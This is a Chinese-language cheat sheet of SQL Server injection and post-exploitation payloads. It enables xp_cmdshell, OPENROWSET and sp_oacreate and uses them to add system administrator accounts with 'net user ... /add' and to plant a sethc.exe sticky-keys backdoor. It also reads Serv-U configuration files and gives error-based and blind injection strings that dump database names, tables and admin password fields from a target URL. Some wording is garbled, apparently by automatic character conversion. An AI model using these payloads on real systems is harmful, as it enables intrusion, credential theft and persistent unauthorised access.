一.开启扩展
1.开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
封锁xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC
sp_configure 'xp_cmdshell', 0;RECONFIGURE;--
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)
2.开启'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec
sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--
查询阐明器里执行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234
/add")')来操作沙盘来添加个打点员
3.开启'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec
sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--
拷贝文件d:/windows/explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o
out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe'
,'c:/sethc.exe';
在查询阐明器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode
xcode /add'
这段代码就是操作SP_OAcreate来添加一个xcode的系统用户 然后直接晋升为打点员权限
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out,
'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
这段代码就可以把ServUDaemon.ini里的设置信息全部显示出来
二.有显错,暴。
and 0<(select count(*) from master.dbo.sysdatabases);--折半法获得数据库个数
and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2.3.4... 获得更多的数据库名
and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法获得表个数(假设暴出库名employ)
and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名
假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj' 以此一直加条件...
and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一个列名
假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....
可能
爆库语句
and (select top 1 isnull(cast([name] as
nvarchar(500)),char(32))+char(124) from
[master].[dbo].[sysdatabases] where dbid in (select top N dbid from
[master].[dbo].[sysdatabases] order by dbid desc))=0--
爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top N
name from somedb.sys.all_objects where type=char(85) order by name)
t order by name desc)=0--
爆字段语句,爆表admin里user='admin'的暗码段
And (Select Top 1 isNull(cast([password] as
varchar(2000)),char(32))+char(124) From (Select Top N [password]
From [somedb]..[admin] Where user='admin' Order by [password]) T
Order by [password]Desc)=0--
三.无显错,盲注。
先说下SQL2005中的查询要领
select * from master.dbo.sysdatabases --查询数据库
select * from NetBook.dbo.sysobjects where xtype='u' --查询数据库NetBook里的表
select * from NetBook.dbo.syscolumns where id=object_id('book') --查询book内外的字段
判定权限:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))
盲注通例步调:
判定库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select
@@version),22,4)='2005'
猜数据库名:
先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5)=1
按照dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
master.dbo.sysdatabases where dbid=5 and
ascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database):
可以实验先看有没打点表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from
database.dbo.sysobjects where xtype='u' and name like
'%admin%')=1
